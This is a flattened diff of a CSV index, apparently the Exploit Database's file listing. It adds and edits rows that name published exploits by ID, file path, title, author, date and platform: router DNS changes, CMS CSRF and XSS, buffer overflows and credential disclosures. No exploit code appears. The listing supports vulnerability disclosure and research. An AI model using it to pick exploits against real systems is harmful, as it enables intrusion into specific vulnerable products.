 44382,exploits/windows/local/44382.py,"Faleemi Windows Desktop Software - (DDNS/IP) Local Buffer Overflow",2018-03-30,"Himavanth Reddy",local,windows,
+44389,exploits/windows/local/44389.txt,"WebLog Expert Enterprise 9.4 - Privilege Escalation",2018-04-02,bzyo,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -39079,6 +39080,15 @@ id,file,description,date,author,type,platform,port 44374,exploits/php/webapps/44374.py,"osCommerce 2.3.4.1 - Remote Code Execution",2018-03-30,"Simon Scannell",webapps,php, 44377,exploits/asp/webapps/44377.txt,"Tenda W316R Wireless Router 5.07.50 - Remote DNS Change",2018-03-30,"Todor Donev",webapps,asp, 44378,exploits/php/webapps/44378.txt,"D-Link DIR-850L Wireless AC1200 Dual Band Gigabit Cloud Router - Authentication Bypass",2018-03-30,"Gem George",webapps,php, -44381,exploits/asp/webapps/44381.txt,"Tenda FH303/A300 Firmware V5.07.68_EN - Remote DNS Change",2018-03-30,"Todor Donev",webapps,asp, +44381,exploits/asp/webapps/44381.txt,"Tenda FH303/A300 Firmware v5.07.68_EN - Remote DNS Change",2018-03-30,"Todor Donev",webapps,asp, 44379,exploits/php/webapps/44379.rb,"Vtiger CRM 6.3.0 - Authenticated Arbitrary File Upload (Metasploit)",2018-03-30,"Touhid M.Shaikh",webapps,php, -44380,exploits/asp/webapps/44380.txt,"Tenda W3002R/A302/w309r Wireless Router V5.07.64_en - Remote DNS Change (PoC)",2018-03-30,"Todor Donev",webapps,asp, +44380,exploits/asp/webapps/44380.txt,"Tenda W3002R/A302/w309r Wireless Router v5.07.64_en - Remote DNS Change (PoC)",2018-03-30,"Todor Donev",webapps,asp, +44383,exploits/php/webapps/44383.html,"Frog CMS 0.9.5 - Cross-Site Request Forgery (Add User)",2018-04-02,"Samrat Das",webapps,php, +44384,exploits/php/webapps/44384.txt,"WampServer 3.1.1 - Cross-Site Scripting / Cross-Site Request Forgery",2018-04-02,"Vipin Chaudhary",webapps,php, +44385,exploits/php/webapps/44385.html,"WampServer 3.1.2 - Cross-Site Request Forgery",2018-04-02,"Vipin Chaudhary",webapps,php, +44386,exploits/perl/webapps/44386.txt,"VideoFlow Digital Video Protection (DVP) 2.10 - Directory Traversal",2018-04-02,LiquidWorm,webapps,perl, +44387,exploits/hardware/webapps/44387.txt,"VideoFlow Digital Video Protection (DVP) 2.10 - Hard-Coded Credentials",2018-04-02,LiquidWorm,webapps,hardware, +44388,exploits/hardware/webapps/44388.txt,"DLink DIR-601 - 
Admin Password Disclosure",2018-04-02,"Kevin Randall",webapps,hardware, +44391,exploits/php/webapps/44391.html,"OpenCMS 10.5.3 - Cross-Site Request Forgery",2018-04-02,"Sureshbabu Narvaneni",webapps,php, +44392,exploits/php/webapps/44392.txt,"OpenCMS 10.5.3 - Cross-Site Scripting",2018-04-02,"Sureshbabu Narvaneni",webapps,php, +44393,exploits/hardware/webapps/44393.sh,"Secutech RiS-11/RiS-22/RiS-33 - Remote DNS Change",2018-04-02,"Todor Donev",webapps,hardware,